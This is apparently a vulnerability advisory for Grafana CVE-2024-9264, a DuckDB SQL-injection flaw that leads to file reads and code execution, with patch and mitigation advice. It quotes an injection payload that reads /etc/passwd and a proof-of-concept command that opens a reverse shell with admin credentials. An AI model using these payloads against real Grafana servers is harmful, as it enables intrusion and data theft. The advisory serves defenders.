Vulnerable Version
Grafana version less than 11.0.5, 11.1.6, and 11.2.1
Fixed Version
later version (11.0.5, 11.1.6, or 11.2.1)
Base Score
9.4 Critical
Vendor Description:-
Grafana is an open-source analytics and monitoring platform designed to visualize, query, and analyze
data from multiple sources in real-time. It provides an intuitive and highly customizable dashboard
interface, enabling users to track key performance metrics, detect trends, and respond to anomalies
across diverse systems and applications.
CVE-2024-9264 Vulnerability Details and Analysis:-
CVE-2024-9264 is a severe vulnerability affecting Grafana versions earlier than 11.0.5, 11.1.6, and 11.2.1,
specifically in systems that use the DuckDB integration for SQL Expressions.
This vulnerability arises due to improper sanitization of SQL queries, allowing remote attackers to inject
arbitrary SQL commands, which can lead to critical exploits, such as arbitrary code execution, and
unauthorized access to sensitive files.
The flaw is triggered when an attacker injects a malformed SQL expression, especially utilizing the
read_csv_auto() function, which is part of the SQL Expressions feature. This function is meant to read CSV
files but can be manipulated to perform actions beyond its intended use. By crafting a malicious SQL query
like SELECT * FROM read_csv_auto(‘/etc/passwd’), attackers can read system files, such as the /etc/passwd
file, which contains sensitive information about system users. Additionally, using the query, attackers can
create arbitrary files with malicious content on the system, and further escalate the attack by executing shell
commands embedded within these files.
One of the most dangerous aspects of this vulnerability is that it does not require any user interaction to be
exploited. Attackers can remotely execute these malicious queries without needing the victim to click on
anything or take any specific action. The ease of exploitation, combined with the critical nature of the
potential damage (remote code execution, unauthorized file access, and manipulation), makes this
vulnerability extremely impactful on organizations running affected versions of Grafana.
The attack’s impact spans the confidentiality, integrity, and availability of the system. Sensitive data can be
compromised by reading system files, and arbitrary commands can be executed, potentially taking control of
the server and launching further attacks. Once the exploit is successful, attackers can escalate privileges,
compromise sensitive data, and disrupt operations, causing significant damage.
Impact
The impact of this vulnerability is severe, as it allows attackers with low privileges to execute arbitrary
commands and exploit local file inclusion, potentially compromising sensitive data and system integrity. This could lead to unauthorized access, data breaches, and the complete compromise of affected systems.
Organizations using vulnerable versions of Grafana are at significant risk and should prioritize remediation efforts.
Mitigation
Users of vulnerable Grafana versions should immediately update to the latest versions (11.0.5, 11.1.6, or
11.2.1) to address CVE-2024-9264. In cases where patching is not possible, manual mitigation steps include removing or excluding the DuckDB executable from the system’s PATH to prevent exploitation. Additionally, organizations should implement monitoring and detection measures to identify unusual SQL queries or other suspicious activities associated with Grafana’s SQL Expressions feature.
POC
Proof Of Concept for Remote Code Execution in Grafana (CVE-2024-9264)
# python poc.py --url http://192.168.29.112:3000 --username admin --password SecurePassword123! -- reverse-ip 192.168.29.116 --reverse-port 9001
POC Video:–
References:-
https://www.sonicwall.com/blog/command-injection-and-local-file-inclusion-in-grafana-cve-2024-9264
https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit